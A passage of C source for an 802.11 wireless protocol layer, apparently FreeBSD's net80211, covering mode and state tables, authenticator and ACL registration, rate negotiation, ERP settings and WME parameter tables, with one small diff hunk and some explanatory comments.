IEEE80211_M_STA */ "WDS", /* IEEE80211_M_WDS */ "AHDEMO", /* IEEE80211_M_AHDEMO */ "HOSTAP", /* IEEE80211_M_HOSTAP */ "MONITOR", /* IEEE80211_M_MONITOR */ "MBSS" /* IEEE80211_M_MBSS */ }; const char *ieee80211_state_name[IEEE80211_S_MAX] = { "INIT", /* IEEE80211_S_INIT */ "SCAN", /* IEEE80211_S_SCAN */ "AUTH", /* IEEE80211_S_AUTH */ "ASSOC", /* IEEE80211_S_ASSOC */ "CAC", /* IEEE80211_S_CAC */ "RUN", /* IEEE80211_S_RUN */ "CSA", /* IEEE80211_S_CSA */ "SLEEP", /* IEEE80211_S_SLEEP */ }; const char *ieee80211_wme_acnames[] = { "WME_AC_BE", "WME_AC_BK", "WME_AC_VI", "WME_AC_VO", "WME_UPSD", }; static void beacon_miss(void *, int); static void beacon_swmiss(void *, int); static void parent_updown(void *, int); static void update_mcast(void *, int); static void update_promisc(void *, int); static void update_channel(void *, int); static void update_chw(void *, int); static void ieee80211_newstate_cb(void *, int); static int null_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ifnet *ifp = ni->ni_ic->ic_ifp; if_printf(ifp, "missing ic_raw_xmit callback, drop frame\n"); m_freem(m); return ENETDOWN; } void ieee80211_proto_attach(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; /* override the 802.3 setting */ ifp->if_hdrlen = ic->ic_headroom + sizeof(struct ieee80211_qosframe_addr4) + IEEE80211_WEP_IVLEN + IEEE80211_WEP_KIDLEN + 
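        /*
         * A worked example of this budget, assuming the stock net80211
         * definitions (not shown in this diff): the 4-address QoS header
         * (struct ieee80211_qosframe_addr4) is 32 bytes, and the
         * IV + key-id + extended-IV expansion is 3 + 1 + 4 = 8 bytes,
         * so if_hdrlen works out to ic_headroom + 40 -- the worst-case
         * encrypted 4-address QoS frame, not the common 3-address case.
         */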
IEEE80211_WEP_EXTIVLEN; /* XXX no way to recalculate on ifdetach */ if (ALIGN(ifp->if_hdrlen) > max_linkhdr) { /* XXX sanity check... */ max_linkhdr = ALIGN(ifp->if_hdrlen); max_hdr = max_linkhdr + max_protohdr; max_datalen = MHLEN - max_hdr; } ic->ic_protmode = IEEE80211_PROT_CTSONLY; TASK_INIT(&ic->ic_parent_task, 0, parent_updown, ifp); TASK_INIT(&ic->ic_mcast_task, 0, update_mcast, ic); TASK_INIT(&ic->ic_promisc_task, 0, update_promisc, ic); TASK_INIT(&ic->ic_chan_task, 0, update_channel, ic); TASK_INIT(&ic->ic_bmiss_task, 0, beacon_miss, ic); TASK_INIT(&ic->ic_chw_task, 0, update_chw, ic); ic->ic_wme.wme_hipri_switch_hysteresis = AGGRESSIVE_MODE_SWITCH_HYSTERESIS; /* initialize management frame handlers */ ic->ic_send_mgmt = ieee80211_send_mgmt; ic->ic_raw_xmit = null_raw_xmit; ieee80211_adhoc_attach(ic); ieee80211_sta_attach(ic); ieee80211_wds_attach(ic); ieee80211_hostap_attach(ic); #ifdef IEEE80211_SUPPORT_MESH ieee80211_mesh_attach(ic); #endif ieee80211_monitor_attach(ic); } void ieee80211_proto_detach(struct ieee80211com *ic) { ieee80211_monitor_detach(ic); #ifdef IEEE80211_SUPPORT_MESH ieee80211_mesh_detach(ic); #endif ieee80211_hostap_detach(ic); ieee80211_wds_detach(ic); ieee80211_adhoc_detach(ic); ieee80211_sta_detach(ic); } static void null_update_beacon(struct ieee80211vap *vap, int item) { } void ieee80211_proto_vattach(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; int i; /* override the 802.3 setting */ ifp->if_hdrlen = ic->ic_ifp->if_hdrlen; vap->iv_rtsthreshold = IEEE80211_RTS_DEFAULT; vap->iv_fragthreshold = IEEE80211_FRAG_DEFAULT; vap->iv_bmiss_max = IEEE80211_BMISS_MAX; callout_init_mtx(&vap->iv_swbmiss, IEEE80211_LOCK_OBJ(ic), 0); callout_init(&vap->iv_mgtsend, CALLOUT_MPSAFE); TASK_INIT(&vap->iv_nstate_task, 0, ieee80211_newstate_cb, vap); TASK_INIT(&vap->iv_swbmiss_task, 0, beacon_swmiss, vap); /* * Install default tx rate handling: no fixed rate, lowest * supported rate for mgmt and multicast frames. Default * max retry count. These settings can be changed by the * driver and/or user applications. */ for (i = IEEE80211_MODE_11A; i < IEEE80211_MODE_MAX; i++) { const struct ieee80211_rateset *rs = &ic->ic_sup_rates[i]; vap->iv_txparms[i].ucastrate = IEEE80211_FIXED_RATE_NONE; /* * Setting the management rate to MCS 0 assumes that the * BSS Basic rate set is empty and the BSS Basic MCS set * is not. * * Since we're not checking this, default to the lowest * defined rate for this mode. * * At least one 11n AP (DLINK DIR-825) is reported to drop * some MCS management traffic (eg BA response frames.) * * See also: 9.6.0 of the 802.11n-2009 specification. 
*/ #ifdef NOTYET if (i == IEEE80211_MODE_11NA || i == IEEE80211_MODE_11NG) { vap->iv_txparms[i].mgmtrate = 0 | IEEE80211_RATE_MCS; vap->iv_txparms[i].mcastrate = 0 | IEEE80211_RATE_MCS; } else { vap->iv_txparms[i].mgmtrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].mcastrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; } #endif vap->iv_txparms[i].mgmtrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].mcastrate = rs->rs_rates[0] & IEEE80211_RATE_VAL; vap->iv_txparms[i].maxretry = IEEE80211_TXMAX_DEFAULT; } vap->iv_roaming = IEEE80211_ROAMING_AUTO; vap->iv_update_beacon = null_update_beacon; vap->iv_deliver_data = ieee80211_deliver_data; /* attach support for operating mode */ ic->ic_vattach[vap->iv_opmode](vap); } void ieee80211_proto_vdetach(struct ieee80211vap *vap) { #define FREEAPPIE(ie) do { \ if (ie != NULL) \ free(ie, M_80211_NODE_IE); \ } while (0) /* * Detach operating mode module. */ if (vap->iv_opdetach != NULL) vap->iv_opdetach(vap); /* * This should not be needed as we detach when reseting * the state but be conservative here since the * authenticator may do things like spawn kernel threads. */ if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); /* * Detach any ACL'ator. */ if (vap->iv_acl != NULL) vap->iv_acl->iac_detach(vap); FREEAPPIE(vap->iv_appie_beacon); FREEAPPIE(vap->iv_appie_probereq); FREEAPPIE(vap->iv_appie_proberesp); FREEAPPIE(vap->iv_appie_assocreq); FREEAPPIE(vap->iv_appie_assocresp); FREEAPPIE(vap->iv_appie_wpa); #undef FREEAPPIE } /* * Simple-minded authenticator module support. */ #define IEEE80211_AUTH_MAX (IEEE80211_AUTH_WPA+1) /* XXX well-known names */ static const char *auth_modnames[IEEE80211_AUTH_MAX] = { "wlan_internal", /* IEEE80211_AUTH_NONE */ "wlan_internal", /* IEEE80211_AUTH_OPEN */ "wlan_internal", /* IEEE80211_AUTH_SHARED */ "wlan_xauth", /* IEEE80211_AUTH_8021X */ "wlan_internal", /* IEEE80211_AUTH_AUTO */ "wlan_xauth", /* IEEE80211_AUTH_WPA */ }; static const struct ieee80211_authenticator *authenticators[IEEE80211_AUTH_MAX]; static const struct ieee80211_authenticator auth_internal = { .ia_name = "wlan_internal", .ia_attach = NULL, .ia_detach = NULL, .ia_node_join = NULL, .ia_node_leave = NULL, }; /* * Setup internal authenticators once; they are never unregistered. */ static void ieee80211_auth_setup(void) { ieee80211_authenticator_register(IEEE80211_AUTH_OPEN, &auth_internal); ieee80211_authenticator_register(IEEE80211_AUTH_SHARED, &auth_internal); ieee80211_authenticator_register(IEEE80211_AUTH_AUTO, &auth_internal); } SYSINIT(wlan_auth, SI_SUB_DRIVERS, SI_ORDER_FIRST, ieee80211_auth_setup, NULL); const struct ieee80211_authenticator * ieee80211_authenticator_get(int auth) { if (auth >= IEEE80211_AUTH_MAX) return NULL; if (authenticators[auth] == NULL) ieee80211_load_module(auth_modnames[auth]); return authenticators[auth]; } void ieee80211_authenticator_register(int type, const struct ieee80211_authenticator *auth) { if (type >= IEEE80211_AUTH_MAX) return; authenticators[type] = auth; } void ieee80211_authenticator_unregister(int type) { if (type >= IEEE80211_AUTH_MAX) return; authenticators[type] = NULL; } /* * Very simple-minded ACL module support. 
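An external authenticator (such as the wlan_xauth flavour loaded on demand via auth_modnames above) plugs into this table from its module-load handler; once registered, ieee80211_authenticator_get() returns it. A sketch under those assumptions, with the module name hypothetical, the hook functions left NULL for brevity, and the usual DECLARE_MODULE boilerplate omitted:

static const struct ieee80211_authenticator myauth = {
        .ia_name        = "wlan_myauth",        /* hypothetical module */
        .ia_attach      = NULL,                 /* a real module supplies */
        .ia_detach      = NULL,                 /* attach/detach and the  */
        .ia_node_join   = NULL,                 /* node join/leave hooks  */
        .ia_node_leave  = NULL,
};

static int
myauth_modevent(module_t mod, int type, void *data)
{
        switch (type) {
        case MOD_LOAD:
                ieee80211_authenticator_register(IEEE80211_AUTH_8021X,
                    &myauth);
                return (0);
        case MOD_UNLOAD:
                ieee80211_authenticator_unregister(IEEE80211_AUTH_8021X);
                return (0);
        default:
                return (EOPNOTSUPP);
        }
}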
*/ /* XXX just one for now */ static const struct ieee80211_aclator *acl = NULL; void ieee80211_aclator_register(const struct ieee80211_aclator *iac) { printf("wlan: %s acl policy registered\n", iac->iac_name); acl = iac; } void ieee80211_aclator_unregister(const struct ieee80211_aclator *iac) { if (acl == iac) acl = NULL; printf("wlan: %s acl policy unregistered\n", iac->iac_name); } const struct ieee80211_aclator * ieee80211_aclator_get(const char *name) { if (acl == NULL) ieee80211_load_module("wlan_acl"); return acl != NULL && strcmp(acl->iac_name, name) == 0 ? acl : NULL; } void ieee80211_print_essid(const uint8_t *essid, int len) { const uint8_t *p; int i; if (len > IEEE80211_NWID_LEN) len = IEEE80211_NWID_LEN; /* determine printable or not */ for (i = 0, p = essid; i < len; i++, p++) { if (*p < ' ' || *p > 0x7e) break; } if (i == len) { printf("\""); for (i = 0, p = essid; i < len; i++, p++) printf("%c", *p); printf("\""); } else { printf("0x"); for (i = 0, p = essid; i < len; i++, p++) printf("%02x", *p); } } void ieee80211_dump_pkt(struct ieee80211com *ic, const uint8_t *buf, int len, int rate, int rssi) { const struct ieee80211_frame *wh; int i; wh = (const struct ieee80211_frame *)buf; switch (wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) { case IEEE80211_FC1_DIR_NODS: printf("NODS %s", ether_sprintf(wh->i_addr2)); printf("->%s", ether_sprintf(wh->i_addr1)); printf("(%s)", ether_sprintf(wh->i_addr3)); break; case IEEE80211_FC1_DIR_TODS: printf("TODS %s", ether_sprintf(wh->i_addr2)); printf("->%s", ether_sprintf(wh->i_addr3)); printf("(%s)", ether_sprintf(wh->i_addr1)); break; case IEEE80211_FC1_DIR_FROMDS: printf("FRDS %s", ether_sprintf(wh->i_addr3)); printf("->%s", ether_sprintf(wh->i_addr1)); printf("(%s)", ether_sprintf(wh->i_addr2)); break; case IEEE80211_FC1_DIR_DSTODS: printf("DSDS %s", ether_sprintf((const uint8_t *)&wh[1])); printf("->%s", ether_sprintf(wh->i_addr3)); printf("(%s", ether_sprintf(wh->i_addr2)); printf("->%s)", ether_sprintf(wh->i_addr1)); break; } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_DATA: printf(" data"); break; case IEEE80211_FC0_TYPE_MGT: printf(" %s", ieee80211_mgt_subtype_name[ (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT]); break; default: printf(" type#%d", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK); break; } if (IEEE80211_QOS_HAS_SEQ(wh)) { const struct ieee80211_qosframe *qwh = (const struct ieee80211_qosframe *)buf; printf(" QoS [TID %u%s]", qwh->i_qos[0] & IEEE80211_QOS_TID, qwh->i_qos[0] & IEEE80211_QOS_ACKPOLICY ? 
" ACM" : ""); } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { int off; off = ieee80211_anyhdrspace(ic, wh); printf(" WEP [IV %.02x %.02x %.02x", buf[off+0], buf[off+1], buf[off+2]); if (buf[off+IEEE80211_WEP_IVLEN] & IEEE80211_WEP_EXTIV) printf(" %.02x %.02x %.02x", buf[off+4], buf[off+5], buf[off+6]); printf(" KID %u]", buf[off+IEEE80211_WEP_IVLEN] >> 6); } if (rate >= 0) printf(" %dM", rate / 2); if (rssi >= 0) printf(" +%d", rssi); printf("\n"); if (len > 0) { for (i = 0; i < len; i++) { if ((i & 1) == 0) printf(" "); printf("%02x", buf[i]); } printf("\n"); } } static __inline int findrix(const struct ieee80211_rateset *rs, int r) { int i; for (i = 0; i < rs->rs_nrates; i++) if ((rs->rs_rates[i] & IEEE80211_RATE_VAL) == r) return i; return -1; } int ieee80211_fix_rate(struct ieee80211_node *ni, struct ieee80211_rateset *nrs, int flags) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; int i, j, rix, error; int okrate, badrate, fixedrate, ucastrate; const struct ieee80211_rateset *srs; uint8_t r; error = 0; okrate = badrate = 0; ucastrate = vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)].ucastrate; if (ucastrate != IEEE80211_FIXED_RATE_NONE) { /* * Workaround awkwardness with fixed rate. We are called * to check both the legacy rate set and the HT rate set * but we must apply any legacy fixed rate check only to the * legacy rate set and vice versa. We cannot tell what type * of rate set we've been given (legacy or HT) but we can * distinguish the fixed rate type (MCS have 0x80 set). * So to deal with this the caller communicates whether to * check MCS or legacy rate using the flags and we use the * type of any fixed rate to avoid applying an MCS to a * legacy rate and vice versa. */ if (ucastrate & 0x80) { if (flags & IEEE80211_F_DOFRATE) flags &= ~IEEE80211_F_DOFRATE; } else if ((ucastrate & 0x80) == 0) { if (flags & IEEE80211_F_DOFMCS) flags &= ~IEEE80211_F_DOFMCS; } /* NB: required to make MCS match below work */ ucastrate &= IEEE80211_RATE_VAL; } fixedrate = IEEE80211_FIXED_RATE_NONE; /* * XXX we are called to process both MCS and legacy rates; * we must use the appropriate basic rate set or chaos will * ensue; for now callers that want MCS must supply * IEEE80211_F_DOBRS; at some point we'll need to split this * function so there are two variants, one for MCS and one * for legacy rates. */ if (flags & IEEE80211_F_DOBRS) srs = (const struct ieee80211_rateset *) ieee80211_get_suphtrates(ic, ni->ni_chan); else srs = ieee80211_get_suprates(ic, ni->ni_chan); for (i = 0; i < nrs->rs_nrates; ) { if (flags & IEEE80211_F_DOSORT) { /* * Sort rates. */ for (j = i + 1; j < nrs->rs_nrates; j++) { if (RV(nrs->rs_rates[i]) > RV(nrs->rs_rates[j])) { r = nrs->rs_rates[i]; nrs->rs_rates[i] = nrs->rs_rates[j]; nrs->rs_rates[j] = r; } } } r = nrs->rs_rates[i] & IEEE80211_RATE_VAL; badrate = r; /* * Check for fixed rate. */ if (r == ucastrate) fixedrate = r; /* * Check against supported rates. */ rix = findrix(srs, r); if (flags & IEEE80211_F_DONEGO) { if (rix < 0) { /* * A rate in the node's rate set is not * supported. If this is a basic rate and we * are operating as a STA then this is an error. * Otherwise we just discard/ignore the rate. */ if ((flags & IEEE80211_F_JOIN) && (nrs->rs_rates[i] & IEEE80211_RATE_BASIC)) error++; } else if ((flags & IEEE80211_F_JOIN) == 0) { /* * Overwrite with the supported rate * value so any basic rate bit is set. 
*/ nrs->rs_rates[i] = srs->rs_rates[rix]; } } if ((flags & IEEE80211_F_DODEL) && rix < 0) { /* * Delete unacceptable rates. */ nrs->rs_nrates--; for (j = i; j < nrs->rs_nrates; j++) nrs->rs_rates[j] = nrs->rs_rates[j + 1]; nrs->rs_rates[j] = 0; continue; } if (rix >= 0) okrate = nrs->rs_rates[i]; i++; } if (okrate == 0 || error != 0 || ((flags & (IEEE80211_F_DOFRATE|IEEE80211_F_DOFMCS)) && fixedrate != ucastrate)) { IEEE80211_NOTE(vap, IEEE80211_MSG_XRATE | IEEE80211_MSG_11N, ni, "%s: flags 0x%x okrate %d error %d fixedrate 0x%x " "ucastrate %x\n", __func__, fixedrate, ucastrate, flags); return badrate | IEEE80211_RATE_BASIC; } else return RV(okrate); #undef RV } /* * Reset 11g-related state. */ void ieee80211_reset_erp(struct ieee80211com *ic) { ic->ic_flags &= ~IEEE80211_F_USEPROT; ic->ic_nonerpsta = 0; ic->ic_longslotsta = 0; /* * Short slot time is enabled only when operating in 11g * and not in an IBSS. We must also honor whether or not * the driver is capable of doing it. */ ieee80211_set_shortslottime(ic, IEEE80211_IS_CHAN_A(ic->ic_curchan) || IEEE80211_IS_CHAN_HT(ic->ic_curchan) || (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && ic->ic_opmode == IEEE80211_M_HOSTAP && (ic->ic_caps & IEEE80211_C_SHSLOT))); /* * Set short preamble and ERP barker-preamble flags. */ if (IEEE80211_IS_CHAN_A(ic->ic_curchan) || (ic->ic_caps & IEEE80211_C_SHPREAMBLE)) { ic->ic_flags |= IEEE80211_F_SHPREAMBLE; ic->ic_flags &= ~IEEE80211_F_USEBARKER; } else { ic->ic_flags &= ~IEEE80211_F_SHPREAMBLE; ic->ic_flags |= IEEE80211_F_USEBARKER; } } /* * Set the short slot time state and notify the driver. */ void ieee80211_set_shortslottime(struct ieee80211com *ic, int onoff) { if (onoff) ic->ic_flags |= IEEE80211_F_SHSLOT; else ic->ic_flags &= ~IEEE80211_F_SHSLOT; /* notify driver */ if (ic->ic_updateslot != NULL) ic->ic_updateslot(ic->ic_ifp); } /* * Check if the specified rate set supports ERP. * NB: the rate set is assumed to be sorted. */ int ieee80211_iserp_rateset(const struct ieee80211_rateset *rs) { static const int rates[] = { 2, 4, 11, 22, 12, 24, 48 }; int i, j; if (rs->rs_nrates < nitems(rates)) return 0; for (i = 0; i < nitems(rates); i++) { for (j = 0; j < rs->rs_nrates; j++) { int r = rs->rs_rates[j] & IEEE80211_RATE_VAL; if (rates[i] == r) goto next; if (r > rates[i]) return 0; } return 0; next: ; } return 1; } /* * Mark the basic rates for the rate table based on the * operating mode. For real 11g we mark all the 11b rates * and 6, 12, and 24 OFDM. For 11b compatibility we mark only * 11b rates. There's also a pseudo 11a-mode used to mark only * the basic OFDM rates. 
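/*
 * A quick sanity check of the rates[] table in ieee80211_iserp_rateset()
 * above, recalling that net80211 carries rates in 500 kb/s units:
 * { 2, 4, 11, 22, 12, 24, 48 } is 1, 2, 5.5, 11, 6, 12 and 24 Mb/s,
 * i.e. the rates an ERP (11g) BSS is required to support.  A sorted
 * full 11g set such as
 *      { 2, 4, 11, 12, 18, 22, 24, 36, 48, 72, 96, 108 }
 * passes, while a plain 11b set { 2, 4, 11, 22 } is rejected up front
 * by the rs_nrates < nitems(rates) test.
 */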
*/ static void setbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode, int add) { static const struct ieee80211_rateset basic[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_11A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_11B] = { 2, { 2, 4 } }, /* NB: mixed b/g */ [IEEE80211_MODE_11G] = { 4, { 2, 4, 11, 22 } }, [IEEE80211_MODE_TURBO_A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_TURBO_G] = { 4, { 2, 4, 11, 22 } }, [IEEE80211_MODE_STURBO_A] = { 3, { 12, 24, 48 } }, [IEEE80211_MODE_HALF] = { 3, { 6, 12, 24 } }, [IEEE80211_MODE_QUARTER] = { 3, { 3, 6, 12 } }, [IEEE80211_MODE_11NA] = { 3, { 12, 24, 48 } }, /* NB: mixed b/g */ [IEEE80211_MODE_11NG] = { 4, { 2, 4, 11, 22 } }, }; int i, j; for (i = 0; i < rs->rs_nrates; i++) { if (!add) rs->rs_rates[i] &= IEEE80211_RATE_VAL; for (j = 0; j < basic[mode].rs_nrates; j++) if (basic[mode].rs_rates[j] == rs->rs_rates[i]) { rs->rs_rates[i] |= IEEE80211_RATE_BASIC; break; } } } /* * Set the basic rates in a rate set. */ void ieee80211_setbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode) { setbasicrates(rs, mode, 0); } /* * Add basic rates to a rate set. */ void ieee80211_addbasicrates(struct ieee80211_rateset *rs, enum ieee80211_phymode mode) { setbasicrates(rs, mode, 1); } /* * WME protocol support. * * The default 11a/b/g/n parameters come from the WiFi Alliance WMM * System Interopability Test Plan (v1.4, Appendix F) and the 802.11n * Draft 2.0 Test Plan (Appendix D). * * Static/Dynamic Turbo mode settings come from Atheros. */ typedef struct phyParamType { uint8_t aifsn; uint8_t logcwmin; uint8_t logcwmax; uint16_t txopLimit; uint8_t acm; } paramType; static const struct phyParamType phyParamForAC_BE[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11A] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11B] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11G] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_FH] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 3, 5, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 3, 5, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 3, 5, 0, 0 }, [IEEE80211_MODE_HALF] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11NA] = { 3, 4, 6, 0, 0 }, [IEEE80211_MODE_11NG] = { 3, 4, 6, 0, 0 }, }; static const struct phyParamType phyParamForAC_BK[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11A] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11B] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11G] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_FH] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 7, 3, 10, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 7, 3, 10, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 7, 3, 10, 0, 0 }, [IEEE80211_MODE_HALF] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11NA] = { 7, 4, 10, 0, 0 }, [IEEE80211_MODE_11NG] = { 7, 4, 10, 0, 0 }, }; static const struct phyParamType phyParamForAC_VI[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11A] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11B] = { 1, 3, 4, 188, 0 }, [IEEE80211_MODE_11G] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_FH] = { 1, 3, 4, 188, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 3, 94, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 3, 94, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 3, 94, 0 }, [IEEE80211_MODE_HALF] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_QUARTER]= { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11NA] = { 1, 3, 4, 94, 0 }, [IEEE80211_MODE_11NG] = { 1, 3, 4, 94, 0 }, }; static const struct phyParamType phyParamForAC_VO[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = 
{ 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11A] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11B] = { 1, 2, 3, 102, 0 }, [IEEE80211_MODE_11G] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_FH] = { 1, 2, 3, 102, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 2, 47, 0 }, [IEEE80211_MODE_HALF] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_QUARTER]= { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11NA] = { 1, 2, 3, 47, 0 }, [IEEE80211_MODE_11NG] = { 1, 2, 3, 47, 0 }, }; static const struct phyParamType bssPhyParamForAC_BE[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11A] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11B] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11G] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_FH] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 3, 10, 0, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 3, 10, 0, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 3, 10, 0, 0 }, [IEEE80211_MODE_HALF] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_QUARTER]= { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11NA] = { 3, 4, 10, 0, 0 }, [IEEE80211_MODE_11NG] = { 3, 4, 10, 0, 0 }, }; static const struct phyParamType bssPhyParamForAC_VI[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11A] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11B] = { 2, 3, 4, 188, 0 }, [IEEE80211_MODE_11G] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_FH] = { 2, 3, 4, 188, 0 }, [IEEE80211_MODE_TURBO_A]= { 2, 2, 3, 94, 0 }, [IEEE80211_MODE_TURBO_G]= { 2, 2, 3, 94, 0 }, [IEEE80211_MODE_STURBO_A]={ 2, 2, 3, 94, 0 }, [IEEE80211_MODE_HALF] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_QUARTER]= { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11NA] = { 2, 3, 4, 94, 0 }, [IEEE80211_MODE_11NG] = { 2, 3, 4, 94, 0 }, }; static const struct phyParamType bssPhyParamForAC_VO[IEEE80211_MODE_MAX] = { [IEEE80211_MODE_AUTO] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11A] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11B] = { 2, 2, 3, 102, 0 }, [IEEE80211_MODE_11G] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_FH] = { 2, 2, 3, 102, 0 }, [IEEE80211_MODE_TURBO_A]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_TURBO_G]= { 1, 2, 2, 47, 0 }, [IEEE80211_MODE_STURBO_A]={ 1, 2, 2, 47, 0 }, [IEEE80211_MODE_HALF] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_QUARTER]= { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11NA] = { 2, 2, 3, 47, 0 }, [IEEE80211_MODE_11NG] = { 2, 2, 3, 47, 0 }, }; static void _setifsparams(struct wmeParams *wmep, const paramType *phy) { wmep->wmep_aifsn = phy->aifsn; wmep->wmep_logcwmin = phy->logcwmin; wmep->wmep_logcwmax = phy->logcwmax; wmep->wmep_txopLimit = phy->txopLimit; } static void setwmeparams(struct ieee80211vap *vap, const char *type, int ac, struct wmeParams *wmep, const paramType *phy) { wmep->wmep_acm = phy->acm; _setifsparams(wmep, phy); IEEE80211_DPRINTF(vap, IEEE80211_MSG_WME, "set %s (%s) [acm %u aifsn %u logcwmin %u logcwmax %u txop %u]\n", ieee80211_wme_acnames[ac], type, wmep->wmep_acm, wmep->wmep_aifsn, wmep->wmep_logcwmin, wmep->wmep_logcwmax, wmep->wmep_txopLimit); } static void ieee80211_wme_initparams_locked(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_wme_state *wme = &ic->ic_wme; const paramType *pPhyParam, *pBssPhyParam; struct wmeParams *wmep; enum ieee80211_phymode mode; int i; IEEE80211_LOCK_ASSERT(ic); if ((ic->ic_caps & IEEE80211_C_WME) == 0 || ic->ic_nrunning > 1) return; /* * Clear the wme cap_info field so a qoscount from a previous * vap doesn't confuse later code which only parses the beacon * field and updates hardware when said field changes. 
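/*
 * Reading the tables above: the columns are { aifsn, logcwmin, logcwmax,
 * txopLimit, acm }, where CWmin/CWmax are 2^logcwmin - 1 and
 * 2^logcwmax - 1 and the TXOP limit is in the 802.11 unit of 32 us.
 * For example the station-side AC_VO entry for 11a/g, { 2, 2, 3, 47, 0 },
 * means AIFSN 2, CWmin 3, CWmax 7 and a 47 * 32 us = 1.504 ms TXOP; the
 * 11b value of 102 gives 3.264 ms.  Roughly, the phyParamForAC_* rows
 * drive the local (hostap) device's EDCA settings while the
 * bssPhyParamForAC_* rows are what gets advertised to stations.
 */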
